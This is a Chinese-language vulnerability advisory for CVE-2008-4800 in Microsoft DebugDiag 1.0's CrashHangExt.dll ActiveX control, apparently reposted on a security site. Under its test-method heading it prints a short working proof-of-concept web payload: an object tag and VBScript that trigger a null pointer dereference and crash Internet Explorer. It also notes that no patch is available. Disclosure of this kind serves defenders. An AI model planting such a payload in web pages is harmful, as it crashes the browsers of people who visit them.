|
||||||||
 |
||||||||
 |
|
|
|||||||||||||||||||
|
||||||||||||||||||||
受影响系统: Microsoft DebugDiag 1.0描述: BUGTRAQ ID: 31996 CVE(CAN) ID: CVE-2008-4800 调试诊断工具(DebugDiag)用于排除Win32用户态进程中挂起、内存泄露或崩溃等故障。 DebugDiag所提供的CrashHangExt.dll没有正确地验证某些输入参数,如果用户受骗访问了恶意网页的话,就会在使用该控件的应用(通常为IE)中触发空指针引用,导致拒绝服务的情况。 <*来源:suN8Hclf (crimson.loyd@gmail.com) 链接:http://marc.info/?l=bugtraq&m=122539295806764&w=2 *> 测试方法: 警 告 <object classid='clsid:7233D6F8-AD31-440F-BAF0-9E7A292A53DA' id='target' /> </object> <script language='vbscript'> arg1=-2147483647 target.GetEntryPointForThread arg1 </script> </body> 建议: 厂商补丁: Microsoft --------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.microsoft.com/technet/security/ |
|
Copyright ◎ 2004 - 2008 红客中国安全网版权所有
|